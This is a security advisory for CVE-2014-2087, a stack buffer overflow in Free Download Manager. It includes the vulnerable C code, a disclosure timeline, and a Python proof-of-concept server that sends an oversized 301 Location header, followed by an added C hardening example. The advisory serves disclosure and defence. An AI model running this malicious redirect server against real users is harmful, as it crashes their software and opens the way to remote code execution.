Free Download Manager – Stack Buffer Overflow

  • Author: Julien Ahrens
    Date: 2014-03-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/32332/
  • RCE Security Advisory
    http://www.rcesecurity.com
     
     
    1. ADVISORY INFORMATION
    -----------------------
    Product: Free Download Manager
    Vendor URL: www.freedownloadmanager.org
    Type: Stack-based Buffer Overflow [CWE-121]
    Date found: 2014-02-20
    Date published: 2014-03-13
    CVSSv2 Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
    CVE: CVE-2014-2087
     
     
    2. CREDITS
    ----------
    This vulnerability was discovered and researched by Julien Ahrens from
    RCE Security.
     
     
    3. VERSIONS AFFECTED
    --------------------
    Free Download Manager v3.9.3 build 1360 (latest at the time of disclosure)
    Free Download Manager v3.8 build 1173
    Free Download Manager v3.0 build 852
    Older versions are likely affected as well.
     
     
    4. VULNERABILITY DESCRIPTION
    ----------------------------
    A stack-based buffer overflow vulnerability has been identified in the
    Free Download Manager.
     
    The application parses download requests, which are added to the
    download queue, but it does not validate the length of the text it
    builds for a queued download when the user removes that entry from
    the queue. The following function from fdm.exe (source file:
    Downloads_Deleted.cpp) is triggered on deletion:
     
    void CDownloads_Deleted::UpdateDownload(int iItem)
     
    This function reads the file name of the download object into szFile
    via CDownloads_Tasks::GetFileName and then appends the complete URL,
    in brackets, as a description through a sequence of unbounded
    lstrcat() calls.
    
    Since the application follows HTTP 301 redirects, an attacker who
    controls the target HTTP server can hand the client an arbitrarily
    long redirect target, and with it an arbitrarily long file name, for
    the queued download. If the file name plus the bracketed URL exceeds
    the size of szFile (10000 bytes), lstrcat() writes past the end of
    the stack buffer.
     
    This leads to a stack-based buffer overflow with an overwritten SEH
    chain or return address, resulting in remote code execution. A
    successful exploit allows a remote attacker to execute arbitrary code
    with the privileges of the user running the application; a failed
    exploit crashes the application (denial of service).
     
    The vulnerability is also exploitable locally via "File->Import->Import
    list of downloads", since an imported list entry carries the same URL.
     
     
    5. VULNERABLE CODE PART
    -----------------------
    // Downloads_Deleted.cpp
     
    void CDownloads_Deleted::UpdateDownload(int iItem)
    {
        vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
     
        CHAR szFile [10000];
        CDownloads_Tasks::GetFileName (dld, szFile);   // file name, unbounded
        lstrcat (szFile, " (");                        // no length check on any
        lstrcat (szFile, dld->pMgr->get_URL ());       // of the three appends
        lstrcat (szFile, ")");
        SetItemText (iItem, 0, szFile);
        [..]
    }
    
    
    6. PROOF-OF-CONCEPT (PYTHON)
    ----------------------------
    #!/usr/bin/env python3
    # Minimal HTTP listener that answers the first request with a 301 whose
    # Location header is 9000 bytes long. Queue a download from this host in
    # FDM; the overflow fires when the queued entry is deleted.
    from socket import socket, AF_INET, SOCK_STREAM
    from time import sleep
     
    host = "192.168.0.1"
    port = 80
     
    s = socket(AF_INET, SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    print("\n[+] Listening on %d ..." % port)
     
    cl, addr = s.accept()
    print("[+] Connection accepted from %s" % addr[0])
     
    # 9000 x 'C': the file name taken from this URL plus the URL itself in
    # brackets exceeds the 10000-byte szFile.
    junk0 = "\x43" * 9000
     
    payload = junk0
     
    buffer = "HTTP/1.1 301 Moved Permanently\r\n"
    buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
    buffer += "Server: Apache/2.2.22 (Debian)\r\n"
    buffer += "Location: " + payload + "\r\n"
    buffer += "Vary: Accept-Encoding\r\n"
    buffer += "Content-Length: 8000\r\n"
    buffer += "Keep-Alive: timeout=5, max=100\r\n"
    buffer += "Connection: Keep-Alive\r\n"
    buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
    buffer += "\r\n"
    buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
    buffer += "<html><head>\n"
    buffer += "<title>301 Moved Permanently</title>\n"
    buffer += "</head><body>\n"
    buffer += "<h1>Moved Permanently</h1>\n"
    buffer += "<p>The document has moved <a href=\"" + payload + "\">here</a>.</p>\n"
    buffer += "</body></html>\n"
     
    print(cl.recv(1000).decode("latin-1"))
    cl.sendall(buffer.encode("latin-1"))
    print("[+] Sending buffer: OK\n")
     
    sleep(1)
    cl.close()
    s.close()
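The two halves of the bug, as an added example in portable C that is not part of the advisory and not Free Download Manager's code: the redirect target is bounded where it is read out of the 301 response the PoC in section 6 sends, and the three unbounded lstrcat() calls from section 5 are replaced by a length check followed by snprintf(). Assumptions not taken from the advisory: that the displayed file name is the last path component of the URL, the constructed 301 response, the example URL, and the use of the C standard library in place of lstrcat().

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SZFILE_LEN 10000  /* sizeof(szFile) in CDownloads_Deleted::UpdateDownload */

/* Case-insensitive prefix test so "location:" matches as well as "Location:". */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Copies the Location header value of a raw HTTP response into out and returns
 * its length, or -1 if it is missing or does not fit: rejected at the source. */
static int extract_location(const char *resp, char *out, size_t outsz)
{
    const char *line = strstr(resp, "\r\n");          /* skip the status line */
    while (line != NULL) {
        line += 2;
        if (line[0] == '\r' && line[1] == '\n')        /* blank line ends the headers */
            break;
        if (has_prefix_ci(line, "Location:")) {
            const char *v = line + 9;
            while (*v == ' ' || *v == '\t') v++;
            const char *end = strstr(v, "\r\n");
            size_t len = end ? (size_t)(end - v) : strlen(v);
            if (len >= outsz)
                return -1;
            memcpy(out, v, len);
            out[len] = '\0';
            return (int)len;
        }
        line = strstr(line, "\r\n");
    }
    return -1;
}

/* Assumption, not stated in the advisory: the displayed file name is the
 * last path component of the URL. */
static const char *filename_from_url(const char *url)
{
    const char *slash = strrchr(url, '/');
    return slash ? slash + 1 : url;
}

/* Bounded replacement for the three lstrcat() calls: compute the required length
 * first and refuse the item instead of truncating. Returns chars written or -1. */
static int update_text_safe(char *szFile, size_t outsz, const char *filename, const char *url)
{
    size_t need = strlen(filename) + 2 + strlen(url) + 1;   /* " (" + url + ")" */
    if (need >= outsz)                       /* keep room for the terminating NUL */
        return -1;
    int n = snprintf(szFile, outsz, "%s (%s)", filename, url);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Builds the list text for one URL in a static buffer; NULL if it does not fit. */
static const char *list_text(const char *url)
{
    static char szFile[SZFILE_LEN];
    if (update_text_safe(szFile, sizeof szFile, filename_from_url(url), url) < 0)
        return NULL;
    return szFile;
}

/* Constructed sample: the 301 the PoC server sends, with a Location of url_len
 * 'C' bytes, pushed through the hardened path. Returns chars written or -1. */
static int verdict_for_redirect(size_t url_len)
{
    static char resp[32768], url[2 * SZFILE_LEN], szFile[SZFILE_LEN];
    if (url_len + 256 > sizeof resp)
        return -1;
    char *target = malloc(url_len + 1);
    if (target == NULL)
        return -1;
    memset(target, 'C', url_len);
    target[url_len] = '\0';
    snprintf(resp, sizeof resp, "HTTP/1.1 301 Moved Permanently\r\n"
             "Location: %s\r\nContent-Type: text/html\r\n\r\n", target);
    free(target);
    if (extract_location(resp, url, sizeof url) < 0)
        return -1;
    return update_text_safe(szFile, sizeof szFile, filename_from_url(url), url);
}

int main(void)
{
    const char *u = "http://example.invalid/files/setup.exe";      /* constructed */
    printf("short URL    : %s\n", list_text(u));
    printf("9000-byte URL: %s\n", verdict_for_redirect(9000) < 0
                                  ? "rejected before any copy" : "accepted");
    return 0;
}
```

With the PoC's 9000-byte Location the required length is 9000 + 2 + 9000 + 1 bytes, so update_text_safe() refuses the entry without touching szFile; the original code would have written almost 8000 bytes past the end of the buffer. Refusing, rather than truncating to 9999 characters, is a deliberate choice: a silently cut URL in the download list would hide from the user what is actually being fetched.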
     
     
    7. SOLUTION
    -----------
    None
     
     
    8. REPORT TIMELINE
    ------------------
    2014-02-20: Discovery of the vulnerability
    2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
    2014-02-24: MITRE assigns CVE-2014-2087
    2014-02-25: Vendor Notification #2
    2014-02-26: Vendor Notification #3
    2014-03-05: Vendor Response
    2014-03-05: Vulnerability details sent to vendor
    2014-03-09: RCE Security asks for a status update
    2014-03-13: No response from vendor
    2014-03-13: Full Disclosure according to disclosure policy
     
     
    9. REFERENCES
    -------------
    http://www.rcesecurity.com/2014/03/cve-2014-2087-free-download-manager-cdownloads_deleted-updatedownload-remote-code-execution